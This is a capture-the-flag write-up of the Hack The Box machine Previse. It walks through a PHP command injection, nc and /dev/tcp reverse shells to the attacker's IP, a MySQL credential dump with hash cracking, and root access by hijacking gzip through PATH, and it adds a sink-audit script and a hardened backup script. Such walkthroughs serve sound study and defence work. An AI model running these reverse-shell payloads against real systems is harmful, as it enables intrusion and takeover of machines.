Lluna's Pure land.

HTB-Previse

0x00. Overview

0x01. Information gathering

Only ports 22 and 80 are open:

┌──(root💀kali)-[~/htb/Previse]
└─# nmap -sC -sV -sT 10.10.11.104 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 08:54 EDT
Nmap scan report for 10.10.11.104
Host is up (0.60s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.49 seconds

0x02. Port 80

There is only a login form. Trying weak credentials got nowhere.

0x03. Directory enumeration

Everything else requires a session first; only nav.php is reachable without logging in:

┌──(root💀kali)-[~/htb/Previse]
└─# gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/08/15 23:38:09 Starting gobuster in directory enumeration mode
===============================================================
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/header.php (Status: 200) [Size: 980]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/config.php (Status: 200) [Size: 0]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/status.php (Status: 302) [Size: 2968] [--> login.php]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/logs.php (Status: 302) [Size: 0] [--> login.php]

===============================================================
2021/08/16 00:12:43 Finished
===============================================================

0x04. nav.php

It exposes a create-user link, but the linked pages all redirect to the login.

Intercept the response in Burp and change the status code.

Change it to 200 and forward the response.

The create-user page now renders and users can be created.

0x05. Login

After creating an admin user, log in.

Under the Files tab, files can be uploaded, but that is not exploitable. There is also a site backup available for download, so download it.

In the backup, config.php and logs.php are the useful ones. Auditing the code shows a command injection in the delim parameter.

config.php
This gives the database user and password:

<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>

logs.php
The log export is done by a Python script (/opt/scripts/log_process.py):

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

// $_POST['delim'] is interpolated into the command line without any escaping:
// this is the command injection sink
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
}
?>
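The sink is easy to find once you know to look for exec-family calls fed straight from request parameters. Here is an added example, not part of the write-up or the box, of a small POSIX shell audit that flags that pattern in PHP sources; the function list and superglobal list are assumptions to extend as needed.

```shell
#!/bin/sh
# Added example (not from the box or the write-up): flag PHP exec-family calls
# whose argument string still contains a raw request superglobal, the pattern
# behind the delim injection in logs.php.
# Usage: audit_php_sinks FILE...
#   prints file:line:code for each hit; exit status 0 when at least one hit
#   was found, 1 when all files are clean (grep-style).
SINKS='(exec|shell_exec|system|passthru|popen|proc_open)'   # assumed list
TAINT='\$_(POST|GET|REQUEST|COOKIE)\['                      # assumed list

audit_php_sinks() {
    found=1
    for f in "$@"; do
        # -H: prefix file name, -n: line number, -E: extended regex.
        # Match a sink call followed, on the same line, by a tainted
        # superglobal; a line that passes through escapeshellarg() on a
        # validated local variable instead does not match.
        if grep -HnE "${SINKS}[[:space:]]*\(.*${TAINT}" "$f"; then
            found=0
        fi
    done
    return $found
}
```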

0x06. Confirming the vulnerability

Listen on port 6666 on Kali:

┌──(root💀kali)-[~]
└─# nc -nvlp 6666 1 ⨯
listening on [any] 6666 ...


Probe with curl.

Kali receives the callback:

┌──(root💀kali)-[~]
└─# nc -nvlp 6666 1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 35806
GET / HTTP/1.1
Host: 10.10.17.216:6666
User-Agent: curl/7.58.0
Accept: */*



0x07. Reverse shell

Keep listening on Kali:

┌──(root💀kali)-[~]
└─# nc -nvlp 6666 1 ⨯
listening on [any] 6666 ...


nc reverse shell payload:

nc -e /bin/sh 10.10.17.216 6666

Kali receives the shell. It is non-interactive, so the mysql client cannot be used from it:

┌──(root💀kali)-[~]
└─# nc -nvlp 6666 1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 35844
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Upgrade to an interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@previse:/var/www/html$

www-data@previse:/var/www/html$

0x08. Logging into MySQL

Retrieve the m4lwhere password hash (md5crypt, $1$):

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

www-data@previse:/var/www/html$ mysql -uroot -p
mysql -uroot -p
Enter password: mySQL_p@ssw0rd!:)

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5810
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)

mysql> use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)

mysql> desc accounts;
desc accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.00 sec)

mysql> select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | admin | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-08-16 09:11:44 |
| 3 | simon | $1$🧂llol$XiMVTMY58ITU/9mYPenku0 | 2021-08-16 09:13:39 |
| 4 | newguy | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 10:42:19 |
| 5 | jonny | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 10:44:39 |
+----+----------+------------------------------------+---------------------+
5 rows in set (0.00 sec)

mysql>

Crack the hash with john:

ilovecody112235!

┌──(root💀kali)-[~/htb/Previse]
└─# john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt userhash
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovecody112235! (?)
1g 0:00:05:50 DONE (2021-08-16 07:03) 0.002855g/s 21171p/s 21171c/s 21171C/s ilovecodydean..ilovecody..
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(root💀kali)-[~/htb/Previse]
└─# cat userhash
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

┌──(root💀kali)-[~/htb/Previse]
└─#

0x09. SSH login

┌──(root💀kali)-[~/htb/Previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Aug 16 11:15:27 UTC 2021

System load: 0.1 Processes: 241
Usage of /: 49.4% of 4.85GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.11.104
Swap usage: 0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ pwd
/home/m4lwhere
m4lwhere@previse:~$ ls
user.txt
m4lwhere@previse:~$ cat user.txt
********************************
m4lwhere@previse:~$

0x10. Privilege escalation

Privilege escalation via sudo -l:

┌──(root💀kali)-[~/htb/Previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Aug 16 12:06:54 UTC 2021

System load: 0.0 Processes: 174
Usage of /: 49.4% of 4.85GB Users logged in: 0
Memory usage: 20% IP address for eth0: 10.10.11.104
Swap usage: 0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$

Look at /opt/scripts/access_backup.sh:

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$

Build the payload by abusing the PATH lookup of gzip:

m4lwhere@previse:~$ cd /tmp
m4lwhere@previse:/tmp$ ls
systemd-private-d085308c77194968bd2248c5047e9e7d-apache2.service-SHI4Vf
systemd-private-d085308c77194968bd2248c5047e9e7d-systemd-resolved.service-c4hkjA
systemd-private-d085308c77194968bd2248c5047e9e7d-systemd-timesyncd.service-oovQQq
vmware-root_904-2697008433
m4lwhere@previse:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ vim gzip
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
bash -i >& /dev/tcp/10.10.17.216/8888 0>&1
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh


Reverse shell as root:

┌──(root💀kali)-[~]
└─# nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.11.104] 51322
root@previse:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@previse:/tmp# whoami
whoami
root
root@previse:~# cd /root
cd /root
root@previse:/root# ls
ls
root.txt
root@previse:/root# cat root.txt
cat root.txt
************************
root@previse:/root#
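For comparison, here is an added example (not the box's script) of how access_backup.sh could be written so that a PATH entry under the caller's control cannot change which gzip or date runs as root: PATH is reset, the tools are resolved once from system directories only, and the backup uses those absolute paths. The trusted_path and backup_log helper names are my own.

```shell
#!/bin/sh
# Added example: hardened rewrite of /opt/scripts/access_backup.sh (not the
# box's script). The original ran "gzip" and "date" through the caller's PATH
# as root, so a writable directory placed first in PATH could supply a
# substitute binary. Fixes: reset PATH, resolve tools once and only from
# system directories, then call them by the resolved absolute path.
set -eu

# Fix 1: never inherit PATH from whoever invoked sudo.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# trusted_path NAME: print NAME's absolute path only if it resolves inside a
# system directory; fail otherwise (a /tmp/gzip ahead in PATH is rejected).
trusted_path() {
    p=$(command -v "$1") || return 1
    case "$p" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*) printf '%s\n' "$p" ;;
        *) return 1 ;;
    esac
}

# Fix 2: pin the tools to their checked absolute paths before doing any work.
GZIP=$(trusted_path gzip) || { echo "gzip not found in system dirs" >&2; exit 1; }
DATE=$(trusted_path date) || { echo "date not found in system dirs" >&2; exit 1; }

# backup_log SRC DEST_DIR: compress SRC into DEST_DIR/<yesterday>_<name>.gz,
# keeping the original naming scheme (e.g. 2021Aug15_access.gz), and print
# the path written.
backup_log() {
    [ -r "$1" ] || { echo "cannot read $1" >&2; return 1; }
    stamp=$("$DATE" --date=yesterday +%Y%b%d)
    out="$2/${stamp}_$(basename "$1" .log).gz"
    "$GZIP" -c "$1" > "$out"
    printf '%s\n' "$out"
}

main() {
    backup_log /var/log/apache2/access.log /var/backups
    backup_log /var/www/file_access.log /var/backups
}

# Run the backup only when installed under the expected name, so the file can
# also be sourced to exercise the functions without touching /var/backups.
case "$0" in */access_backup.sh) main ;; esac
```

Ubuntu's stock /etc/sudoers also sets Defaults secure_path, which on its own would have blocked this hijack; the script should not depend on that being in place.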


------------- So much to say, so little paper. See you next time -------------